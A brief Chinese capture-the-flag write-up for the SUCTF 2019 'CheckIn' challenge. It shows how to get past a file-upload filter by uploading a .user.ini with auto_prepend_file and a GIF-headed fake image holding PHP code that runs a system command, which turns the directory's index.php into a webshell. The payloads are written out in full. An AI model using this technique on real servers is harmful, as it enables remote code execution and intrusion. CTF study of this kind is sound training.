[SUCTF 2019]CheckIn
知识点
- 文件上传
- .user.ini
利用.user.ini进行文件上传,参考自从SUCTF 2019 CheckIn 浅谈.user.ini的利用
上传这样的一个ini文件
GIF89a
auto_prepend_file=a.jpg
再上传一个a.jpg文件
GIF89a <script language='php'>system('cat /flag');</script>
访问uploads/2c67ca1eaeadbdc1868d67003072b481/index.php即可得到flag
注意:上传目录下要有一个正常的php文件,这里为index.php
- 设置.user.ini为auto_prepend_file=a.jpg,即在文件前再加一个a.jpg文件
- 在index.php文件的开始处添加一句话木马
- 访问上传目录下的index.php文件即可执行webshell
